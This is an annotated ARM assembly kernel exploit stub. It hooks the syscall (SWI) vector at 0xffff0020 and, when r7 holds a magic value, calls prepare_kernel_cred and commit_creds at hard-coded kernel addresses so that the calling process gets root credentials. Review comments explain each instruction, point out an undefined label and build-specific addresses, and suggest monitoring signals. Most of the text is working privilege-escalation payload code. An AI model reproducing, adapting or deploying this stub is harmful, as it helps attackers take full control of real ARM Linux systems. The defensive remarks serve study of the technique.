@ This code will be written to 0xffff0020.
@ It elevates the privileges of the calling process and
@ returns to userland.
@ Hooked handler stub (ARM, GNU as syntax). It acts only when r7 holds a magic
@ value; any other value takes the branch to `exit`.
@ r7 is presumably the EABI syscall-number register here, since the last line
@ hands off to the "normal swi handler" - confirm against the caller.
@ NOTE(review): the `exit` label is not defined in the visible listing;
@ presumably it marks the hand-off to the normal handler at the bottom.
@
@ Defensive note: the stub only works if the vector page can be written and
@ the two absolute call targets below match the running kernel image. Signals
@ worth monitoring are any change to the vector page contents and a process
@ whose credentials change without going through a normal exec/setuid path.
@ check if magic
cmp r7, #0xb0000000
bne exit
@ Save r0-r12 on the current stack before calling out.
stmfd sp!,{r0-r12}
@ r0 = 0 is the first argument to the call below.
mov r0, #0
@ NOTE(review): the call targets are absolute addresses hard-coded for one
@ kernel build; the commented-out values look like the same symbols for another
@ build. They are wrong on any kernel whose layout differs.
@ldr r3, =0xc0049a00 @ prepare_kernel_cred
ldr r3, =0xc006d980 @ prepare_kernel_cred
blx r3
@ r0 is not modified between the two calls, so the value returned by the first
@ call is passed as the first argument to the second.
@ldr r4, =0xc0049438 @ commit_creds
ldr r4, =0xc006d3c4 @ commit_creds
blx r4
@ Pops r0-r12 and pc from the stack. With pc in the list, the ^ suffix also
@ copies SPSR into CPSR, which makes this an exception return to the mode that
@ was interrupted.
ldmfd sp!, {r0-r12, pc}^ @ return to userland
@ go to syscall handler
@ Loads pc from a literal slot at pc + 980, so the target depends on where this
@ instruction is placed.
ldr pc, [pc, #980] @ go to normal swi handler